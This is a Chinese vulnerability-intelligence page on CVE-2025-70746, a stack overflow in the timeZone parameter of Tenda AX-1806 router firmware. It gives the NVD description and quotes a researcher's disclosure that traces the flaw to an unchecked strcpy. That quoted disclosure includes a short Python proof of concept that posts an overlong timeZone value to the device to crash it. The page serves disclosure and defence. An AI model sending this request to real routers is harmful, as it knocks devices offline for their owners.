支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:736

73.6%
一、 漏洞 CVE-2025-70746 基础信息
漏洞信息
                                        # N/A

## 概述
Tenda AX-1806 v1.0.0.1 设备在 `fromSetSysTime` 函数的 `timeZone` 参数中存在栈溢出漏洞。

## 影响版本
Tenda AX-1806 v1.0.0.1

## 细节
漏洞存在于 `fromSetSysTime` 函数中,攻击者可通过构造恶意请求,向 `timeZone` 参数传入超长数据,导致栈溢出。

## 影响
攻击者可利用该漏洞触发拒绝服务(DoS),导致设备宕机或重启。
                                        
神龙判断

是否为 Web 类漏洞: 未知

判断理由:

N/A
提示
尽管我们采用了先进的大模型技术,但其输出仍可能包含不准确或过时的信息。
神龙会尽力确保数据准确,但也请结合实际情况进行甄别与判断。
神龙祝您一切顺利!
漏洞标题
N/A
来源:美国国家漏洞数据库 NVD
漏洞描述信息
Tenda AX-1806 v1.0.0.1 was discovered to contain a stack overflow in the timeZone parameter of the fromSetSysTime function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request.
来源:美国国家漏洞数据库 NVD
CVSS信息
N/A
来源:美国国家漏洞数据库 NVD
漏洞类别
N/A
来源:美国国家漏洞数据库 NVD
二、漏洞 CVE-2025-70746 的公开POC
#POC 描述源链接神龙链接
三、漏洞 CVE-2025-70746 的情报信息
  • 标题: VulnbyCola/Tenda/AX-1806/4/1.md at main · 0-fool/VulnbyCola · GitHub -- 🔗来源链接

    标签:

    神龙速读:
                                            ## Tenda AX-1806 Vulnerability
    
    - **Vendor**: Tenda
    - **Product**: AX-1806
    - **Version**: v1.0.0.1 ([Download Link](https://www.tenda.com.cn/download/detail-3421.html))
    - **Vulnerability Type**: Stack Overflow
    - **Author**: Shuhao Shen
    - **Email**: <shenshuhao@hust.edu.cn>
    - **Institution**: Huazhong University of Science and Technology (HUST)
    
    ### Vulnerability Cause
    
    The `timeZone` value from user-controlled input via `v2` is obtained from `sub_295C8(a1, "timeZone", &unk_1C2CF0)` and then copied into the local buffer at `&v22` using `strcpy((char *)&v22, v2)`. If the check `strchr(v2, 58)` fails, the destination buffer `(char *)&v22` points into a fixed-size stack region starting at `v22`, with adjacent stack variables laid out consecutively. `strcpy` performs no bounds checking on the length of the source string. Since the `timeZone` parameter is directly supplied by the user without length restriction, an attacker can provide an excessively long value, causing `strcpy` to write past the intended bounds and corrupt stack memory, leading to a stack-based buffer overflow, crashing the process and causing Denial of Service.
    
    ### Proof of Concept (PoC)
    
    To reproduce the vulnerability:
    
    1. Boot the firmware via qemu-system or a real machine.
    2. Use the following PoC attack:
    
    ```python
    import requests
    
    url = "http://192.168.20.12/goform/SetSysTimeCfg"
    
    timeZone = "A"*7000
    data = {
        "timeZone": timeZone
    }
    
    r = requests.post(url, data=data)
    print(r.status_code, r.text)
    ```
    
    ### Result
    
    The target router crashes and cannot provide services correctly or persistently.
                                            
    VulnbyCola/Tenda/AX-1806/4/1.md at main · 0-fool/VulnbyCola · GitHub
  • https://nvd.nist.gov/vuln/detail/CVE-2025-70746
四、漏洞 CVE-2025-70746 的评论

暂无评论


发表评论